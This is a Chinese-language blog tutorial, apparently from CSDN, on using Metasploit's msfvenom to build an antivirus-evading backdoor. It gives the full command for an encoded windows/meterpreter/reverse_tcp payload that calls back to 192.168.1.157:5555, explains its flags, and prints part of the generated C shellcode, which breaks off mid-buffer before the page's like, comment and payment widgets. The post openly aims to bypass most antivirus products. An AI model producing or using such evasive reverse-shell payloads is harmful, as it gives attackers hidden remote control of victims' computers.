利用metasploit生成免杀后门

免杀

之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。

免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软

静态免杀

静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。

使用工具:kali、vc++6.0

在kali中生成shellcode免杀

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b\x00’ lhost=192.168.1.157 lport=5555 -f c -o /root/Desktop/sha.c

e参数指定编码方式,i参数指定编码次数,b参数去除指定代码,一般是空代码或者错误代码,-f指定生成格式,-o指定输出路径。

执行上述代码之后,会生成sha.c,名字可以随意

打开sha.c文件,其中代码为:

unsigned char buf[] = 
"\xdd\xc3\xd9\x74\x24\xf4\x5d\xba\xbd\xe7\xf9\x0b\x31\xc9\xb1"
"\x6f\x31\x55\x18\x83\xed\xfc\x03\x55\xa9\x05\x0c\xd2\x3d\x77"
"\x53\x61\x35\xaf\x75\x1e\x61\x44\xde\xec\xa0\x15\x89\x23\x41"
"\x4f\xc9\x87\xa1\x6c\xbe\x12\xf7\x03\x13\xe7\x40\xea\xd3\xe6"
"\x63\xa0\x0c\xe9\x4f\x15\x78\x32\xa8\x5e\xf1\xf2\x2d\x5d\xf4"
"\x26\x31\xca\xe4\xf0\x75\x9b\xc1\x98\x45\xe0\x4d\xf0\x9e\xb4"
"\x9d\xf3\x1d\xca\xc0\xa0\x3f\xe9\x5a\x79\xcb\x54\x24\xd6\x73"
"\x5a\xd6\x36\x6a\xa2\xff\x53\xe9\x4f\x73\x92\x53\x24\x1b\xc5"
"\x5a\x62\x22\x49\x23\x6d\x35\x23\x49\x21\xc1\xc8\x70\x89\x0f"
"\xa7\x95\x5b\x43\x2b\x94\xcf\x91\x89\x61\x18\xa7\x83\x76\x3f"
"\x91\x83\x53\x84\xa3\xa8\x05\x53\x1c\x71\x73\x69\x0f\x33\x11"
"\xeb\xef\x79\xc2\x30
  • 4
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值